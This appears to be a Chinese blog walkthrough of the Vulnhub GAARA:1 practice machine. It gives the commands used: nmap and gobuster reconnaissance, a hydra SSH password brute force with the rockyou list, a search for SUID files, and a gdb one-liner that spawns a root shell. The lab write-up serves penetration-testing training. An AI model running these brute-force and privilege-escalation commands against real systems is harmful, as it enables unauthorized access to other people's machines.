Vulnhub:GAARA:1靶机

2021/6/6 18:21:27

本文主要是介绍Vulnhub:GAARA:1靶机,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

1.在浏览器中输入目标靶机IP地址,浏览网页
在这里插入图片描述

2.端口扫描

nmap -p- 192.168.31.144
nmap -sC -sV -p 22,80 192.168.31.144

在这里插入图片描述
3.目录枚举
扫描到一个Cryoserver目录,接下来在网页中打开

gobuster dir -u http://192.168.31.144 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

在这里插入图片描述
在浏览器中打开这个目录之后,在底部存在三个提示目录,接下来继续探索这三个目录
在这里插入图片描述
在/iamGaara目录下发现了一串加密字符串
在这里插入图片描述
请教过好大哥得知是base58加密,解密之后得到下面得内容;ssh登录失败,接下来尝试gaara作为用户名暴力破解
在这里插入图片描述

4.暴力破解

hydra -l gaara -P /usr/share/wordlists/rockyou.txt 192.168.31.144 ssh

在这里插入图片描述
5.ssh成功登录系统,查找拥有SUID权限的文件

find / -perm -u=s -type f 2>/dev/null

利用gdb这个文件可以成功获取root权限

gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

在这里插入图片描述

最后,谢谢大家伙百忙之中观看我的文章。



这篇关于Vulnhub:GAARA:1靶机的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程